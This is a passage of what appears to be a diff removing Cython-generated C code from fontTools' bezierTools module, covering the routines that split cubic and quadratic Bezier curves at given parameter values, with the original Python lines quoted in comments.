__pyx_pf_9fontTools_4misc_11bezierTools_37splitCubicIntoTwoAtTC(__pyx_self, __pyx_v_pt1, __pyx_v_pt2, __pyx_v_pt3, __pyx_v_pt4, __pyx_v_t); - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_37splitCubicIntoTwoAtTC(CYTHON_UNUSED PyObject *__pyx_self, __pyx_t_double_complex __pyx_v_pt1, __pyx_t_double_complex __pyx_v_pt2, __pyx_t_double_complex __pyx_v_pt3, __pyx_t_double_complex __pyx_v_pt4, double __pyx_v_t) { - double __pyx_v_t2; - double __pyx_v__1_t; - double __pyx_v__1_t_2; - double __pyx_v__2_t_1_t; - __pyx_t_double_complex __pyx_v_pointAtT; - __pyx_t_double_complex __pyx_v_off1; - __pyx_t_double_complex __pyx_v_off2; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - PyObject *__pyx_t_3 = NULL; - PyObject *__pyx_t_4 = NULL; - PyObject *__pyx_t_5 = NULL; - PyObject *__pyx_t_6 = NULL; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("splitCubicIntoTwoAtTC", 1); - - /* "fontTools/misc/bezierTools.py":685 - * A tuple of two curve segments (each curve segment being four complex numbers). - * """ - * t2 = t * t # <<<<<<<<<<<<<< - * _1_t = 1 - t - * _1_t_2 = _1_t * _1_t - */ - __pyx_v_t2 = (__pyx_v_t * __pyx_v_t); - - /* "fontTools/misc/bezierTools.py":686 - * """ - * t2 = t * t - * _1_t = 1 - t # <<<<<<<<<<<<<< - * _1_t_2 = _1_t * _1_t - * _2_t_1_t = 2 * t * _1_t - */ - __pyx_v__1_t = (1.0 - __pyx_v_t); - - /* "fontTools/misc/bezierTools.py":687 - * t2 = t * t - * _1_t = 1 - t - * _1_t_2 = _1_t * _1_t # <<<<<<<<<<<<<< - * _2_t_1_t = 2 * t * _1_t - * pointAtT = ( - */ - __pyx_v__1_t_2 = (__pyx_v__1_t * __pyx_v__1_t); - - /* "fontTools/misc/bezierTools.py":688 - * _1_t = 1 - t - * _1_t_2 = _1_t * _1_t - * _2_t_1_t = 2 * t * _1_t # <<<<<<<<<<<<<< - * pointAtT = ( - * _1_t_2 * _1_t * pt1 + 3 * (_1_t_2 * t * pt2 + _1_t * t2 * pt3) + t2 * t * pt4 - */ - __pyx_v__2_t_1_t = ((2.0 * __pyx_v_t) * __pyx_v__1_t); - - /* "fontTools/misc/bezierTools.py":690 - * _2_t_1_t = 2 * t * _1_t - * pointAtT = ( - * _1_t_2 * _1_t * pt1 + 3 * (_1_t_2 * t * pt2 + _1_t * t2 * pt3) + t2 * t * pt4 # <<<<<<<<<<<<<< - * ) - * off1 = _1_t_2 * pt1 + _2_t_1_t * pt2 + t2 * pt3 - */ - __pyx_v_pointAtT = __Pyx_c_sum_double(__Pyx_c_sum_double(__Pyx_c_prod_double(__pyx_t_double_complex_from_parts((__pyx_v__1_t_2 * __pyx_v__1_t), 0), __pyx_v_pt1), __Pyx_c_prod_double(__pyx_t_double_complex_from_parts(3, 0), __Pyx_c_sum_double(__Pyx_c_prod_double(__pyx_t_double_complex_from_parts((__pyx_v__1_t_2 * __pyx_v_t), 0), __pyx_v_pt2), __Pyx_c_prod_double(__pyx_t_double_complex_from_parts((__pyx_v__1_t * __pyx_v_t2), 0), __pyx_v_pt3)))), __Pyx_c_prod_double(__pyx_t_double_complex_from_parts((__pyx_v_t2 * __pyx_v_t), 0), __pyx_v_pt4)); - - /* "fontTools/misc/bezierTools.py":692 - * _1_t_2 * _1_t * pt1 + 3 * (_1_t_2 * t * pt2 + _1_t * t2 * pt3) + t2 * t * pt4 - * ) - * off1 = _1_t_2 * pt1 + _2_t_1_t * pt2 + t2 * pt3 # <<<<<<<<<<<<<< - * off2 = _1_t_2 * pt2 + _2_t_1_t * pt3 + t2 * pt4 - * - */ - __pyx_v_off1 = __Pyx_c_sum_double(__Pyx_c_sum_double(__Pyx_c_prod_double(__pyx_t_double_complex_from_parts(__pyx_v__1_t_2, 0), __pyx_v_pt1), __Pyx_c_prod_double(__pyx_t_double_complex_from_parts(__pyx_v__2_t_1_t, 0), __pyx_v_pt2)), __Pyx_c_prod_double(__pyx_t_double_complex_from_parts(__pyx_v_t2, 0), __pyx_v_pt3)); - - /* "fontTools/misc/bezierTools.py":693 - * ) - * off1 = _1_t_2 * pt1 + _2_t_1_t * pt2 + t2 * pt3 - * off2 = _1_t_2 * pt2 + _2_t_1_t * pt3 + t2 * pt4 # <<<<<<<<<<<<<< - * - * pt2 = pt1 + (pt2 - pt1) * t - */ - __pyx_v_off2 = __Pyx_c_sum_double(__Pyx_c_sum_double(__Pyx_c_prod_double(__pyx_t_double_complex_from_parts(__pyx_v__1_t_2, 0), __pyx_v_pt2), __Pyx_c_prod_double(__pyx_t_double_complex_from_parts(__pyx_v__2_t_1_t, 0), __pyx_v_pt3)), __Pyx_c_prod_double(__pyx_t_double_complex_from_parts(__pyx_v_t2, 0), __pyx_v_pt4)); - - /* "fontTools/misc/bezierTools.py":695 - * off2 = _1_t_2 * pt2 + _2_t_1_t * pt3 + t2 * pt4 - * - * pt2 = pt1 + (pt2 - pt1) * t # <<<<<<<<<<<<<< - * pt3 = pt4 + (pt3 - pt4) * _1_t - * - */ - __pyx_v_pt2 = __Pyx_c_sum_double(__pyx_v_pt1, __Pyx_c_prod_double(__Pyx_c_diff_double(__pyx_v_pt2, __pyx_v_pt1), __pyx_t_double_complex_from_parts(__pyx_v_t, 0))); - - /* "fontTools/misc/bezierTools.py":696 - * - * pt2 = pt1 + (pt2 - pt1) * t - * pt3 = pt4 + (pt3 - pt4) * _1_t # <<<<<<<<<<<<<< - * - * return ((pt1, pt2, off1, pointAtT), (pointAtT, off2, pt3, pt4)) - */ - __pyx_v_pt3 = __Pyx_c_sum_double(__pyx_v_pt4, __Pyx_c_prod_double(__Pyx_c_diff_double(__pyx_v_pt3, __pyx_v_pt4), __pyx_t_double_complex_from_parts(__pyx_v__1_t, 0))); - - /* "fontTools/misc/bezierTools.py":698 - * pt3 = pt4 + (pt3 - pt4) * _1_t - * - * return ((pt1, pt2, off1, pointAtT), (pointAtT, off2, pt3, pt4)) # <<<<<<<<<<<<<< - * - * - */ - __Pyx_XDECREF(__pyx_r); - __pyx_t_1 = __pyx_PyComplex_FromComplex(__pyx_v_pt1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 698, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = __pyx_PyComplex_FromComplex(__pyx_v_pt2); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 698, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = __pyx_PyComplex_FromComplex(__pyx_v_off1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 698, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = __pyx_PyComplex_FromComplex(__pyx_v_pointAtT); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 698, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_5 = PyTuple_New(4); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 698, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_GIVEREF(__pyx_t_1); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_5, 0, __pyx_t_1)) __PYX_ERR(0, 698, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_2); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_5, 1, __pyx_t_2)) __PYX_ERR(0, 698, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_3); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_5, 2, __pyx_t_3)) __PYX_ERR(0, 698, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_4); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_5, 3, __pyx_t_4)) __PYX_ERR(0, 698, __pyx_L1_error); - __pyx_t_1 = 0; - __pyx_t_2 = 0; - __pyx_t_3 = 0; - __pyx_t_4 = 0; - __pyx_t_4 = __pyx_PyComplex_FromComplex(__pyx_v_pointAtT); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 698, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_3 = __pyx_PyComplex_FromComplex(__pyx_v_off2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 698, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_2 = __pyx_PyComplex_FromComplex(__pyx_v_pt3); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 698, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = __pyx_PyComplex_FromComplex(__pyx_v_pt4); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 698, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_6 = PyTuple_New(4); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 698, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_GIVEREF(__pyx_t_4); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_6, 0, __pyx_t_4)) __PYX_ERR(0, 698, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_3); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_6, 1, __pyx_t_3)) __PYX_ERR(0, 698, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_2); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_6, 2, __pyx_t_2)) __PYX_ERR(0, 698, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_1); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_6, 3, __pyx_t_1)) __PYX_ERR(0, 698, __pyx_L1_error); - __pyx_t_4 = 0; - __pyx_t_3 = 0; - __pyx_t_2 = 0; - __pyx_t_1 = 0; - __pyx_t_1 = PyTuple_New(2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 698, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_GIVEREF(__pyx_t_5); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 0, __pyx_t_5)) __PYX_ERR(0, 698, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_6); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 1, __pyx_t_6)) __PYX_ERR(0, 698, __pyx_L1_error); - __pyx_t_5 = 0; - __pyx_t_6 = 0; - __pyx_r = __pyx_t_1; - __pyx_t_1 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":661 - * - * - * @cython.returns(cython.complex) # <<<<<<<<<<<<<< - * @cython.locals( - * t=cython.double, - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_3); - __Pyx_XDECREF(__pyx_t_4); - __Pyx_XDECREF(__pyx_t_5); - __Pyx_XDECREF(__pyx_t_6); - __Pyx_AddTraceback("fontTools.misc.bezierTools.splitCubicIntoTwoAtTC", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":701 - * - * - * def _splitQuadraticAtT(a, b, c, *ts): # <<<<<<<<<<<<<< - * ts = list(ts) - * segments = [] - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_40_splitQuadraticAtT(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_39_splitQuadraticAtT, "_splitQuadraticAtT(a, b, c, *ts)"); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_40_splitQuadraticAtT = {"_splitQuadraticAtT", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_40_splitQuadraticAtT, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_39_splitQuadraticAtT}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_40_splitQuadraticAtT(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - PyObject *__pyx_v_a = 0; - PyObject *__pyx_v_b = 0; - PyObject *__pyx_v_c = 0; - PyObject *__pyx_v_ts = 0; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[3] = {0,0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("_splitQuadraticAtT (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - __pyx_v_ts = __Pyx_ArgsSlice_FASTCALL(__pyx_args, 3, __pyx_nargs); - if (unlikely(!__pyx_v_ts)) { - __Pyx_RefNannyFinishContext(); - return NULL; - } - __Pyx_GOTREF(__pyx_v_ts); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_a,&__pyx_n_s_b,&__pyx_n_s_c,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - default: - case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - CYTHON_FALLTHROUGH; - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_a)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 701, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_b)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 701, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("_splitQuadraticAtT", 0, 3, 3, 1); __PYX_ERR(0, 701, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 2: - if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_c)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[2]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 701, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("_splitQuadraticAtT", 0, 3, 3, 2); __PYX_ERR(0, 701, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - const Py_ssize_t used_pos_args = (kwd_pos_args < 3) ? kwd_pos_args : 3; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, used_pos_args, "_splitQuadraticAtT") < 0)) __PYX_ERR(0, 701, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs < 3)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - } - __pyx_v_a = values[0]; - __pyx_v_b = values[1]; - __pyx_v_c = values[2]; - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("_splitQuadraticAtT", 0, 3, 3, __pyx_nargs); __PYX_ERR(0, 701, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_DECREF(__pyx_v_ts); __pyx_v_ts = 0; - __Pyx_AddTraceback("fontTools.misc.bezierTools._splitQuadraticAtT", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_39_splitQuadraticAtT(__pyx_self, __pyx_v_a, __pyx_v_b, __pyx_v_c, __pyx_v_ts); - - /* function exit code */ - __Pyx_DECREF(__pyx_v_ts); - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_39_splitQuadraticAtT(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_a, PyObject *__pyx_v_b, PyObject *__pyx_v_c, PyObject *__pyx_v_ts) { - PyObject *__pyx_v_segments = NULL; - PyObject *__pyx_v_ax = NULL; - PyObject *__pyx_v_ay = NULL; - PyObject *__pyx_v_bx = NULL; - PyObject *__pyx_v_by = NULL; - PyObject *__pyx_v_cx = NULL; - PyObject *__pyx_v_cy = NULL; - PyObject *__pyx_v_i = NULL; - PyObject *__pyx_v_t1 = NULL; - PyObject *__pyx_v_t2 = NULL; - PyObject *__pyx_v_delta = NULL; - PyObject *__pyx_v_delta_2 = NULL; - PyObject *__pyx_v_a1x = NULL; - PyObject *__pyx_v_a1y = NULL; - PyObject *__pyx_v_b1x = NULL; - PyObject *__pyx_v_b1y = NULL; - PyObject *__pyx_v_t1_2 = NULL; - PyObject *__pyx_v_c1x = NULL; - PyObject *__pyx_v_c1y = NULL; - PyObject *__pyx_v_pt1 = NULL; - PyObject *__pyx_v_pt2 = NULL; - PyObject *__pyx_v_pt3 = NULL; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - int __pyx_t_3; - PyObject *__pyx_t_4 = NULL; - PyObject *(*__pyx_t_5)(PyObject *); - Py_ssize_t __pyx_t_6; - PyObject *(*__pyx_t_7)(PyObject *); - PyObject *__pyx_t_8 = NULL; - PyObject *__pyx_t_9 = NULL; - PyObject *__pyx_t_10 = NULL; - PyObject *__pyx_t_11 = NULL; - int __pyx_t_12; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("_splitQuadraticAtT", 0); - __Pyx_INCREF(__pyx_v_ts); - - /* "fontTools/misc/bezierTools.py":702 - * - * def _splitQuadraticAtT(a, b, c, *ts): - * ts = list(ts) # <<<<<<<<<<<<<< - * segments = [] - * ts.insert(0, 0.0) - */ - __pyx_t_1 = PySequence_List(__pyx_v_ts); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 702, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF_SET(__pyx_v_ts, __pyx_t_1); - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":703 - * def _splitQuadraticAtT(a, b, c, *ts): - * ts = list(ts) - * segments = [] # <<<<<<<<<<<<<< - * ts.insert(0, 0.0) - * ts.append(1.0) - */ - __pyx_t_1 = PyList_New(0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 703, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_v_segments = ((PyObject*)__pyx_t_1); - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":704 - * ts = list(ts) - * segments = [] - * ts.insert(0, 0.0) # <<<<<<<<<<<<<< - * ts.append(1.0) - * ax, ay = a - */ - __pyx_t_1 = __Pyx_PyObject_GetAttrStr(__pyx_v_ts, __pyx_n_s_insert); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 704, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = __Pyx_PyObject_Call(__pyx_t_1, __pyx_tuple__2, NULL); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 704, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":705 - * segments = [] - * ts.insert(0, 0.0) - * ts.append(1.0) # <<<<<<<<<<<<<< - * ax, ay = a - * bx, by = b - */ - __pyx_t_3 = __Pyx_PyObject_Append(__pyx_v_ts, __pyx_float_1_0); if (unlikely(__pyx_t_3 == ((int)-1))) __PYX_ERR(0, 705, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":706 - * ts.insert(0, 0.0) - * ts.append(1.0) - * ax, ay = a # <<<<<<<<<<<<<< - * bx, by = b - * cx, cy = c - */ - if ((likely(PyTuple_CheckExact(__pyx_v_a))) || (PyList_CheckExact(__pyx_v_a))) { - PyObject* sequence = __pyx_v_a; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 706, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_1 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_2 = PyList_GET_ITEM(sequence, 0); - __pyx_t_1 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_2); - __Pyx_INCREF(__pyx_t_1); - #else - __pyx_t_2 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 706, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 706, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - #endif - } else { - Py_ssize_t index = -1; - __pyx_t_4 = PyObject_GetIter(__pyx_v_a); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 706, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_5 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_4); - index = 0; __pyx_t_2 = __pyx_t_5(__pyx_t_4); if (unlikely(!__pyx_t_2)) goto __pyx_L3_unpacking_failed; - __Pyx_GOTREF(__pyx_t_2); - index = 1; __pyx_t_1 = __pyx_t_5(__pyx_t_4); if (unlikely(!__pyx_t_1)) goto __pyx_L3_unpacking_failed; - __Pyx_GOTREF(__pyx_t_1); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_5(__pyx_t_4), 2) < 0) __PYX_ERR(0, 706, __pyx_L1_error) - __pyx_t_5 = NULL; - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - goto __pyx_L4_unpacking_done; - __pyx_L3_unpacking_failed:; - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __pyx_t_5 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 706, __pyx_L1_error) - __pyx_L4_unpacking_done:; - } - __pyx_v_ax = __pyx_t_2; - __pyx_t_2 = 0; - __pyx_v_ay = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":707 - * ts.append(1.0) - * ax, ay = a - * bx, by = b # <<<<<<<<<<<<<< - * cx, cy = c - * for i in range(len(ts) - 1): - */ - if ((likely(PyTuple_CheckExact(__pyx_v_b))) || (PyList_CheckExact(__pyx_v_b))) { - PyObject* sequence = __pyx_v_b; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 707, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_1 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_1 = PyList_GET_ITEM(sequence, 0); - __pyx_t_2 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_1); - __Pyx_INCREF(__pyx_t_2); - #else - __pyx_t_1 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 707, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 707, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - #endif - } else { - Py_ssize_t index = -1; - __pyx_t_4 = PyObject_GetIter(__pyx_v_b); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 707, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_5 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_4); - index = 0; __pyx_t_1 = __pyx_t_5(__pyx_t_4); if (unlikely(!__pyx_t_1)) goto __pyx_L5_unpacking_failed; - __Pyx_GOTREF(__pyx_t_1); - index = 1; __pyx_t_2 = __pyx_t_5(__pyx_t_4); if (unlikely(!__pyx_t_2)) goto __pyx_L5_unpacking_failed; - __Pyx_GOTREF(__pyx_t_2); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_5(__pyx_t_4), 2) < 0) __PYX_ERR(0, 707, __pyx_L1_error) - __pyx_t_5 = NULL; - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - goto __pyx_L6_unpacking_done; - __pyx_L5_unpacking_failed:; - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __pyx_t_5 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 707, __pyx_L1_error) - __pyx_L6_unpacking_done:; - } - __pyx_v_bx = __pyx_t_1; - __pyx_t_1 = 0; - __pyx_v_by = __pyx_t_2; - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":708 - * ax, ay = a - * bx, by = b - * cx, cy = c # <<<<<<<<<<<<<< - * for i in range(len(ts) - 1): - * t1 = ts[i] - */ - if ((likely(PyTuple_CheckExact(__pyx_v_c))) || (PyList_CheckExact(__pyx_v_c))) { - PyObject* sequence = __pyx_v_c; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 708, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_1 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_2 = PyList_GET_ITEM(sequence, 0); - __pyx_t_1 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_2); - __Pyx_INCREF(__pyx_t_1); - #else - __pyx_t_2 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 708, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 708, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - #endif - } else { - Py_ssize_t index = -1; - __pyx_t_4 = PyObject_GetIter(__pyx_v_c); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 708, __pyx_L1_error) - 